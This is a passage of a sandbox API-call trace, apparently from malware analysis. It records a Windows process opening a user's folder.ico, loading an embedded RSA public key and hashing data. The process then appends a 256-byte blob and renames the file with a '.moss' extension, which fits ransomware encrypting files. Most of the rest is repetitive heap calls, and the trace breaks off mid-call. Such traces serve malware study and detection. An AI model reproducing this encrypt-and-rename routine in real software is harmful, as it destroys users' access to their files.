ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0172.244] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned=".ico" [0172.244] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.246] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=29926) returned 1 [0172.246] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.250] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x74c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.250] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.252] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0172.252] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x74e6, lpOverlapped=0x0) returned 1 [0172.254] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.254] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ec78) returned 1 [0172.255] CryptCreateHash (in: hProv=0xd2ec78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.256] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.256] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.256] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.256] GetLastError () returned 0x0 [0172.256] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.256] CryptReleaseContext (hProv=0xd2ec78, dwFlags=0x0) returned 1 [0172.256] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.256] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.256] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.256] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.256] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.257] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.257] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x74e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.257] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.258] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0172.258] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.moss")) returned 1 [0172.259] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.259] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.259] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.260] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0172.260] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 0 [0172.260] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.261] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.261] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2eae0 | out: hHeap=0xcd0000) returned 1 [0172.261] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46128 [0172.261] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.261] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.261] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.261] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.261] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.261] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.261] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.261] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.261] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.261] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.262] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.263] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.263] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.263] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.263] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.263] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.263] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.263] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.263] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.263] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.263] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.263] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.263] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.263] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.263] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.266] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.266] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.266] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.266] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.266] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.266] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.266] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.266] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.266] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.266] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.266] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.266] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.266] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.266] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.266] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.266] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.266] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.267] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.267] HeapFree (in: 